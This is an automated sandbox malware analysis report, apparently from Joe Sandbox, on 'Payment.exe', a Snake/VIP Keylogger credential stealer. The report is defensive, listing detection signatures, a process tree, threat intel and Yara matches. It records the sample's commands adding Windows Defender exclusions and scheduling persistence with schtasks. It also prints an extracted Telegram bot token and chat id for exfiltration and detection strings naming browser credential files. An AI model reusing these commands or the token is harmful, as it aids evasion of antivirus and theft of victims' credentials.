Edit tour

Windows Analysis Report
Payment.exe

Overview

General Information

Sample name:	Payment.exe
Analysis ID:	1662149
MD5:	d901ba37a7c16410f6307bd095943464
SHA1:	8173dbc5eda6f8828e46c3ca961a966e90677549
SHA256:	f2392e04e5ffb9bcee95ce763a7686322a9abd7210af28ef3f653402515a6013
Tags:	exeuser-lowmal3
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains potential unpacker

Adds a directory exclusion to Windows Defender

Contains functionality to behave differently if execute on a Russian/Kazak computer

Creates files in the system32 config directory

Creates files inside the volume driver (system volume information)

Drops executable to a common third party application directory

Found direct / indirect Syscall (likely to bypass EDR)

Found evasive API chain (may stop execution after checking computer name)

Found evasive API chain (may stop execution after checking volume information)

Infects executable files (exe, dll, sys, html)

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Queries random domain names (often used to prevent blacklisting and sinkholes)

Sample uses string decryption to hide its real strings

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Connects to many different domains

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Enables driver privileges

Enables security privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain checking for process token information

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Queries time zone information

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Spawns drivers

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Payment.exe (PID: 3532 cmdline: "C:\Users\user\Desktop\Payment.exe" MD5: D901BA37A7C16410F6307BD095943464)

powershell.exe (PID: 1264 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 4184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6056 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jwBqGZseW.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 5348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7764 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 1972 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jwBqGZseW" /XML "C:\Users\user\AppData\Local\Temp\tmp18CE.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 3452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Payment.exe (PID: 7248 cmdline: "C:\Users\user\Desktop\Payment.exe" MD5: D901BA37A7C16410F6307BD095943464)

vds.exe (PID: 1972 cmdline: C:\Windows\System32\vds.exe MD5: C42169A3F10B54E8CC842D02D0C984CE)

armsvc.exe (PID: 7316 cmdline: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" MD5: F5BCBACCEA71830B4ADA5AACE7DD6009)

alg.exe (PID: 7352 cmdline: C:\Windows\System32\alg.exe MD5: F5F9F809D3FB18C48C3370D67E8F57F0)

AppVStrm.sys (PID: 4 cmdline: MD5: BDA55F89B69757320BC125FF1CB53B26)

AppvVemgr.sys (PID: 4 cmdline: MD5: E70EE9B57F8D771E2F4D6E6B535F6757)

AppvVfs.sys (PID: 4 cmdline: MD5: 2CBABD729D5E746B6BD8DC1B4B4DB1E1)

AppVClient.exe (PID: 7404 cmdline: C:\Windows\system32\AppVClient.exe MD5: D02ADE3690351E51274F8DAB3EF8527B)

FXSSVC.exe (PID: 7496 cmdline: C:\Windows\system32\fxssvc.exe MD5: 641F60CC8AA8AE371354EF47EF1E9B50)

elevation_service.exe (PID: 7588 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: C62328C824D1142307E89E24A97CCB4F)

jwBqGZseW.exe (PID: 7616 cmdline: C:\Users\user\AppData\Roaming\jwBqGZseW.exe MD5: D901BA37A7C16410F6307BD095943464)

schtasks.exe (PID: 7336 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jwBqGZseW" /XML "C:\Users\user\AppData\Local\Temp\tmp401D.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

jwBqGZseW.exe (PID: 6056 cmdline: "C:\Users\user\AppData\Roaming\jwBqGZseW.exe" MD5: D901BA37A7C16410F6307BD095943464)

maintenanceservice.exe (PID: 7644 cmdline: "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" MD5: 9CB9A6DEF1322C7B613C658F9B032D53)

msdtc.exe (PID: 7676 cmdline: C:\Windows\System32\msdtc.exe MD5: 63CA6225D09DACD20B222A08A4B863DB)

PerceptionSimulationService.exe (PID: 7756 cmdline: C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe MD5: 5028FF3766791F2B40040BD7FCC5FB38)

perfhost.exe (PID: 7856 cmdline: C:\Windows\SysWow64\perfhost.exe MD5: D98A44031FF26B76D4FF4A6C3CF564FF)

Locator.exe (PID: 7896 cmdline: C:\Windows\system32\locator.exe MD5: CAC0C346600DADC3A2F9844B57034E37)

SensorDataService.exe (PID: 7940 cmdline: C:\Windows\System32\SensorDataService.exe MD5: CFADB5EC4017AD003BBB2B494F78B9B2)

snmptrap.exe (PID: 7976 cmdline: C:\Windows\System32\snmptrap.exe MD5: 0663B0F3EC10C5CD298AB00AE4A219E6)

Spectrum.exe (PID: 8012 cmdline: C:\Windows\system32\spectrum.exe MD5: F5FAE39097EBC6CF8E317DF792A8F652)

ssh-agent.exe (PID: 8068 cmdline: C:\Windows\System32\OpenSSH\ssh-agent.exe MD5: 4AC4E5CA0E55BB2A8A197339FAE080BE)

TieringEngineService.exe (PID: 8152 cmdline: C:\Windows\system32\TieringEngineService.exe MD5: FD56E587DAEE784FCDE019B8B3A0AE0F)

AgentService.exe (PID: 2788 cmdline: C:\Windows\system32\AgentService.exe MD5: 9FBA24FB61189666E7B7AB809CF7EA57)

wbengine.exe (PID: 7544 cmdline: "C:\Windows\system32\wbengine.exe" MD5: E0CBE1D15877EC451B37D7A94F40D6D1)

svchost.exe (PID: 7952 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "Telegram", "Bot Token": "7222288618:AAHmjWFpZ08g76_6xr4NgmiN7PynC_nQC7Y", "Chat id": "7941708421"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "7222288618:AAHmjWFpZ08g76_6xr4NgmiN7PynC_nQC7Y", "Chat_id": "7941708421", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000008.00000002.2150772680.0000000003CF1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000008.00000002.2167539914.0000000004D71000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.2167539914.0000000004D71000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000008.00000002.2167539914.0000000004D71000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000027.00000002.2157331716.0000000005D10000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000027.00000002.2157331716.0000000005D10000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000027.00000002.2157331716.0000000005D10000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000027.00000002.2157331716.0000000005D10000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x354b8:$a1: get_encryptedPassword 0x3548c:$a2: get_encryptedUsername 0x35550:$a3: get_timePasswordChanged 0x35468:$a4: get_passwordField 0x354ce:$a5: set_encryptedPassword 0x3529b:$a7: get_logins 0x30b76:$a10: KeyLoggerEventArgs 0x30b45:$a11: KeyLoggerEventArgsEventHandler 0x3536f:$a13: _encryptedPassword
00000027.00000002.2157331716.0000000005D10000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3f249:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3e8ec:$a3: \Google\Chrome\User Data\Default\Login Data 0x3eb49:$a4: \Orbitum\User Data\Default\Login Data 0x3f528:$a5: \Kometa\User Data\Default\Login Data
00000027.00000002.2157331716.0000000005D10000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33008:$s1: UnHook 0x32fa4:$s2: SetHook 0x32fdd:$s3: CallNextHook 0x32f6c:$s4: _hook
00000027.00000002.2134571739.000000000368F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000027.00000002.2134571739.000000000368F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000027.00000002.2134571739.000000000368F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000027.00000002.2134571739.000000000368F000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x771f6:$a1: get_encryptedPassword 0x771ca:$a2: get_encryptedUsername 0x7728e:$a3: get_timePasswordChanged 0x771a6:$a4: get_passwordField 0x7720c:$a5: set_encryptedPassword 0x76fd9:$a7: get_logins 0x728b4:$a10: KeyLoggerEventArgs 0x72883:$a11: KeyLoggerEventArgsEventHandler 0x770ad:$a13: _encryptedPassword
00000027.00000002.2138445632.0000000003ADF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.2149738780.0000000003C40000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.2149738780.0000000003C40000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000008.00000002.2149738780.0000000003C40000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000008.00000002.2149738780.0000000003C40000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x363d8:$a1: get_encryptedPassword 0x363ac:$a2: get_encryptedUsername 0x36470:$a3: get_timePasswordChanged 0x36388:$a4: get_passwordField 0x363ee:$a5: set_encryptedPassword 0x361bb:$a7: get_logins 0x31a96:$a10: KeyLoggerEventArgs 0x31a65:$a11: KeyLoggerEventArgsEventHandler 0x3628f:$a13: _encryptedPassword
00000008.00000002.2149738780.0000000003C40000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x40169:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3f80c:$a3: \Google\Chrome\User Data\Default\Login Data 0x3fa69:$a4: \Orbitum\User Data\Default\Login Data 0x40448:$a5: \Kometa\User Data\Default\Login Data
00000008.00000002.2149738780.0000000003C40000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33f28:$s1: UnHook 0x33ec4:$s2: SetHook 0x33efd:$s3: CallNextHook 0x33e8c:$s4: _hook
00000008.00000002.2150772680.0000000003DD5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000027.00000002.2150258037.0000000004A5D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000027.00000002.2138445632.00000000039D1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: Payment.exe PID: 3532	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Payment.exe PID: 7248	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Payment.exe PID: 7248	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: Payment.exe PID: 7248	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: Payment.exe PID: 7248	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x4018c:$a1: get_encryptedPassword 0x8ab87:$a1: get_encryptedPassword 0x40160:$a2: get_encryptedUsername 0x8ab5b:$a2: get_encryptedUsername 0x40224:$a3: get_timePasswordChanged 0x8ac1f:$a3: get_timePasswordChanged 0x4013c:$a4: get_passwordField 0x8ab37:$a4: get_passwordField 0x401a2:$a5: set_encryptedPassword 0x8ab9d:$a5: set_encryptedPassword 0x3ff78:$a7: get_logins 0x8a973:$a7: get_logins 0x873b3:$a10: KeyLoggerEventArgs 0x87382:$a11: KeyLoggerEventArgsEventHandler 0x40043:$a13: _encryptedPassword 0x8aa3e:$a13: _encryptedPassword
Process Memory Space: jwBqGZseW.exe PID: 7616	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: jwBqGZseW.exe PID: 6056	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: jwBqGZseW.exe PID: 6056	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: jwBqGZseW.exe PID: 6056	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: jwBqGZseW.exe PID: 6056	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x24a7a:$a1: get_encryptedPassword 0x47747:$a1: get_encryptedPassword 0x24a4e:$a2: get_encryptedUsername 0x4771b:$a2: get_encryptedUsername 0x24b12:$a3: get_timePasswordChanged 0x477df:$a3: get_timePasswordChanged 0x24a2a:$a4: get_passwordField 0x476f7:$a4: get_passwordField 0x24a90:$a5: set_encryptedPassword 0x4775d:$a5: set_encryptedPassword 0x24866:$a7: get_logins 0x47533:$a7: get_logins 0x21193:$a10: KeyLoggerEventArgs 0x43f73:$a10: KeyLoggerEventArgs 0x21162:$a11: KeyLoggerEventArgsEventHandler 0x43f42:$a11: KeyLoggerEventArgsEventHandler 0x24931:$a13: _encryptedPassword 0x475fe:$a13: _encryptedPassword
Click to see the 29 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
8.2.Payment.exe.3c40000.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.Payment.exe.3c40000.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
8.2.Payment.exe.3c40000.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
8.2.Payment.exe.3c40000.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x363d8:$a1: get_encryptedPassword 0x363ac:$a2: get_encryptedUsername 0x36470:$a3: get_timePasswordChanged 0x36388:$a4: get_passwordField 0x363ee:$a5: set_encryptedPassword 0x361bb:$a7: get_logins 0x31a96:$a10: KeyLoggerEventArgs 0x31a65:$a11: KeyLoggerEventArgsEventHandler 0x3628f:$a13: _encryptedPassword
8.2.Payment.exe.3c40000.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x40169:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3f80c:$a3: \Google\Chrome\User Data\Default\Login Data 0x3fa69:$a4: \Orbitum\User Data\Default\Login Data 0x40448:$a5: \Kometa\User Data\Default\Login Data
8.2.Payment.exe.3c40000.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33f28:$s1: UnHook 0x33ec4:$s2: SetHook 0x33efd:$s3: CallNextHook 0x33e8c:$s4: _hook
18.2.jwBqGZseW.exe.43414a8.1.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1bcb0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x19d0a0:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x19d720:$s3: 83 EC 38 53 B0 06 88 44 24 2B 88 44 24 2F B0 D5 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1d98a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1d5d0:$s5: delete[] 0x1ca88:$s6: constructor or from DllMain.
18.2.jwBqGZseW.exe.43414a8.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 06 88 44 24 2B 88 44 24 2F B0 D5 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
18.2.jwBqGZseW.exe.44e24c8.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 06 88 44 24 2B 88 44 24 2F B0 D5 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
39.2.jwBqGZseW.exe.36cfe1e.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
39.2.jwBqGZseW.exe.36cfe1e.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
39.2.jwBqGZseW.exe.36cfe1e.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
39.2.jwBqGZseW.exe.36cfe1e.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x345d8:$a1: get_encryptedPassword 0x345ac:$a2: get_encryptedUsername 0x34670:$a3: get_timePasswordChanged 0x34588:$a4: get_passwordField 0x345ee:$a5: set_encryptedPassword 0x343bb:$a7: get_logins 0x2fc96:$a10: KeyLoggerEventArgs 0x2fc65:$a11: KeyLoggerEventArgsEventHandler 0x3448f:$a13: _encryptedPassword
39.2.jwBqGZseW.exe.36cfe1e.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3e369:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3da0c:$a3: \Google\Chrome\User Data\Default\Login Data 0x3dc69:$a4: \Orbitum\User Data\Default\Login Data 0x3e648:$a5: \Kometa\User Data\Default\Login Data
39.2.jwBqGZseW.exe.36cfe1e.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x32128:$s1: UnHook 0x320c4:$s2: SetHook 0x320fd:$s3: CallNextHook 0x3208c:$s4: _hook
39.2.jwBqGZseW.exe.36d0d3e.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
39.2.jwBqGZseW.exe.36d0d3e.0.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
39.2.jwBqGZseW.exe.36d0d3e.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
39.2.jwBqGZseW.exe.36d0d3e.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x354b8:$a1: get_encryptedPassword 0x3548c:$a2: get_encryptedUsername 0x35550:$a3: get_timePasswordChanged 0x35468:$a4: get_passwordField 0x354ce:$a5: set_encryptedPassword 0x3529b:$a7: get_logins 0x30b76:$a10: KeyLoggerEventArgs 0x30b45:$a11: KeyLoggerEventArgsEventHandler 0x3536f:$a13: _encryptedPassword
39.2.jwBqGZseW.exe.36d0d3e.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3f249:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3e8ec:$a3: \Google\Chrome\User Data\Default\Login Data 0x3eb49:$a4: \Orbitum\User Data\Default\Login Data 0x3f528:$a5: \Kometa\User Data\Default\Login Data
39.2.jwBqGZseW.exe.36d0d3e.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33008:$s1: UnHook 0x32fa4:$s2: SetHook 0x32fdd:$s3: CallNextHook 0x32f6c:$s4: _hook
39.2.jwBqGZseW.exe.36cfe1e.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
39.2.jwBqGZseW.exe.36cfe1e.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
39.2.jwBqGZseW.exe.36cfe1e.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
39.2.jwBqGZseW.exe.36cfe1e.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x363d8:$a1: get_encryptedPassword 0x363ac:$a2: get_encryptedUsername 0x36470:$a3: get_timePasswordChanged 0x36388:$a4: get_passwordField 0x363ee:$a5: set_encryptedPassword 0x361bb:$a7: get_logins 0x31a96:$a10: KeyLoggerEventArgs 0x31a65:$a11: KeyLoggerEventArgsEventHandler 0x3628f:$a13: _encryptedPassword
39.2.jwBqGZseW.exe.36cfe1e.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x40169:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3f80c:$a3: \Google\Chrome\User Data\Default\Login Data 0x3fa69:$a4: \Orbitum\User Data\Default\Login Data 0x40448:$a5: \Kometa\User Data\Default\Login Data
39.2.jwBqGZseW.exe.36cfe1e.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33f28:$s1: UnHook 0x33ec4:$s2: SetHook 0x33efd:$s3: CallNextHook 0x33e8c:$s4: _hook
39.2.jwBqGZseW.exe.36d0d3e.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
39.2.jwBqGZseW.exe.36d0d3e.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
39.2.jwBqGZseW.exe.36d0d3e.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
39.2.jwBqGZseW.exe.36d0d3e.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x338b8:$a1: get_encryptedPassword 0x3388c:$a2: get_encryptedUsername 0x33950:$a3: get_timePasswordChanged 0x33868:$a4: get_passwordField 0x338ce:$a5: set_encryptedPassword 0x3369b:$a7: get_logins 0x2ef76:$a10: KeyLoggerEventArgs 0x2ef45:$a11: KeyLoggerEventArgsEventHandler 0x3376f:$a13: _encryptedPassword
39.2.jwBqGZseW.exe.36d0d3e.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3d649:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3ccec:$a3: \Google\Chrome\User Data\Default\Login Data 0x3cf49:$a4: \Orbitum\User Data\Default\Login Data 0x3d928:$a5: \Kometa\User Data\Default\Login Data
39.2.jwBqGZseW.exe.36d0d3e.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x31408:$s1: UnHook 0x313a4:$s2: SetHook 0x313dd:$s3: CallNextHook 0x3136c:$s4: _hook
